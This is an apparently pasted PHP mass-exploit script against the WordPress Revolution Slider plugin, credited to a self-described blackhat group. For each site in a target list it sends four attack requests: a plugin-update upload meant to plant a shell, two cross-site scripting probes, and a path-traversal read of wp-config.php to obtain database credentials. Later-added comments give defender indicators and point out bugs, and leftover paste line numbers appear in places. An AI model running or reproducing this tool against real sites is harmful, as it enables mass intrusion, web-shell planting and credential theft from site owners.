
Untitled

a guest
Oct 12th, 2017
<?php
/** me@dwisiswanto.my.id **/

/******************************************
First, install PHP CLI
USAGE: php exploit.php list-of-target.txt
******************************************/

// Values sent by the probes further down in this script. For anyone reviewing
// logs, these literal strings are what the requests carry.
$cafc = array(
    "file"=>"revslider.zip", // sent as the update_file field; the author expects a zip holding a shell file
    "xss"=>"<marquee>CaFc Versace was Here", // HTML marker string sent by the two XSS probes
    "kfg"=>"..\wp-config.php" // relative path sent as img to request the WordPress config file
);
  14.  
  15. function hajar($yuerel, $dataAing=null) {
  16. $cuih = curl_init();
  17. curl_setopt($cuih, CURLOPT_URL, $yuerel);
  18. if ($dataAing != null){
  19. curl_setopt($cuih, CURLOPT_POST, true);
  20. curl_setopt($cuih, CURLOPT_POSTFIELDS, $dataAing);
  21. }
  22. curl_setopt($cuih, CURLOPT_FOLLOWLOCATION, true);
  23. curl_setopt($cuih, CURLOPT_RETURNTRANSFER, true);
  24. curl_setopt($cuih, CURLOPT_SSL_VERIFYPEER, false);
  25. $eks = curl_exec($cuih);
  26. curl_close($cuih);
  27. return $eks;
  28. }
  29.  
// Main script: reads a target list from the file named in $argv[1], splits it
// on CRLF, and sends four POST requests per entry to /wp-admin/admin-ajax.php,
// each addressing a different revslider AJAX action.
//
// Defender notes (every value below is taken from the requests in this loop):
//  - The requests carry action=revslider_ajax_action (with client_action set
//    to update_plugin, get_captions_css, or an HTML string) or
//    action=revslider_show_image with img=..\wp-config.php. They are sent as
//    POST fields, so they show up in request-body or WAF logging rather than
//    in the query string of an access log.
//  - The first probe prints a path under
//    wp-content/plugins/revslider/temp/update_extract/; on a site that
//    received these requests, unexpected files in that directory deserve a look.
//  - If the last probe was answered with wp-config.php contents, the database
//    credentials and keys/salts in that file should be treated as exposed and
//    rotated, and the plugin updated to a fixed release.
//  - The SUCCESS / NOT VULNERABLE verdicts rest on loose == checks against
//    decoded JSON and are not reliable evidence either way.
$site = @file_get_contents($argv[1]); // @ hides the warning if the file cannot be read
$tumbal = explode("\r\n", $site);
echo "Calculate the target list : " . count($tumbal);
// NOTE(review): file_get_contents() returns false on failure and isset(false)
// is true, so this branch is not taken when the read fails.
if (!isset($site)) {
    echo "Site N/A.";
} else {
    foreach ($tumbal as $uri) {
        echo "\n------------------------------------";
        echo "\nTarget => " . $uri;
        echo "\n";
        // Probe 1: update_plugin action, with update_file set to the
        // $cafc['file'] string.
        $menta = hajar($uri . "/wp-admin/admin-ajax.php", array(
            "action" => "revslider_ajax_action",
            "client_action" => "update_plugin",
            "update_file" => $cafc['file'])
        );
        $jason = json_decode($menta, true);
        // Anything other than success == false or message "Wrong request" is
        // reported as SUCCESS; the printed path is a template (YOUR_FILE.php),
        // not something read back from the response.
        if ($jason['success'] == false || $jason['message'] == "Wrong request") {
            echo "\nExploit [update_plugin] => NOT VULNERABLE";
        } else {
            echo "\nExploit [update_plugin] => SUCCESS";
            echo "\n[+] " . $uri . "/wp-content/plugins/revslider/temp/update_extract/revslider/YOUR_FILE.php\n";
        }

        // Probe 2: get_captions_css action with the HTML marker as data.
        $menta2 = hajar($uri . "/wp-admin/admin-ajax.php", array(
            "action" => "revslider_ajax_action",
            "client_action" => "get_captions_css",
            "data" => $cafc['xss'])
        );
        $jasonB = json_decode($menta2, true);
        // NOTE(review): the second operand reads $jason (the probe 1 response),
        // not $jasonB.
        if ($jasonB['success'] == false || $jason['message'] == "Wrong request") {
            echo "\nExploit [get_captions_css] => NOT VULNERABLE";
        } elseif ($jasonB['success'] == true) {
            echo "\nExploit [get_captions_css] => SUCCESS";
            echo "\n[+] " . $uri . "/wp-admin/admin-ajax.php?";
            echo "action=revslider_ajax_action&";
            echo "client_action=get_captions_css";
            echo "data=" . urlencode($cafc['xss']) . "\n";
        }

        // Probe 3: the HTML marker is sent as the client_action value itself.
        $menta3 = hajar($uri . "/wp-admin/admin-ajax.php", array(
            "action" => "revslider_ajax_action",
            "client_action" => $cafc['xss'])
        );
        $jasonC = json_decode($menta3, true);
        // The verdict only checks that the message contains "wrong ajax action";
        // it does not check whether the marker appears in the response.
        if (preg_match("/wrong ajax action/i", $jasonC['message'])) {
            echo "\nExploit [xss] => SUCCESS";
            echo "\n[+] " . $uri . "/wp-admin/admin-ajax.php?";
            echo "action=revslider_ajax_action";
            echo "client_action=" . urlencode($cafc['xss']) . "\n";
        } else {
            echo "\nExploit [xss] => NOT VULNERABLE";
        }

        // Probe 4: revslider_show_image action with img pointing at
        // ..\wp-config.php. hajar() declares two parameters, so the extra $uri
        // argument is not used by it.
        $menta4 = hajar($uri . "/wp-admin/admin-ajax.php", array(
            "action" => "revslider_show_image",
            "img" => $cafc['kfg']),
        $uri);
        // Loose comparisons on the raw response body; how the == 0 test treats
        // a non-numeric string depends on the PHP version.
        if ($menta4 == "empty image" || $menta4 == "image file not found" || $menta4 == 0) {
            echo "\nExploit [wp-config] => NOT VULNERABLE\n";
        } else {
            echo "\nExploit [wp-config] => SUCCESS";
            echo "\n[+] " . $uri . "/wp-admin/admin-ajax.php?";
            echo "action=revslider_show_image";
            echo "img=" . $cafc['kfg'] . "\n";
        }
    }
}
?>
  98. -------------------------------------------------------------------------------------
  99.  
  100.  
  101. # Credits :
  102. -------------------------------------------------------------------------------------
  103. CaFc Versace
  104. Thanks : Agency CaFc - Surabaya BlackHat
  105. -------------------------------------------------------------------------------------
  106.  
  107.  
  108. ./learn to be better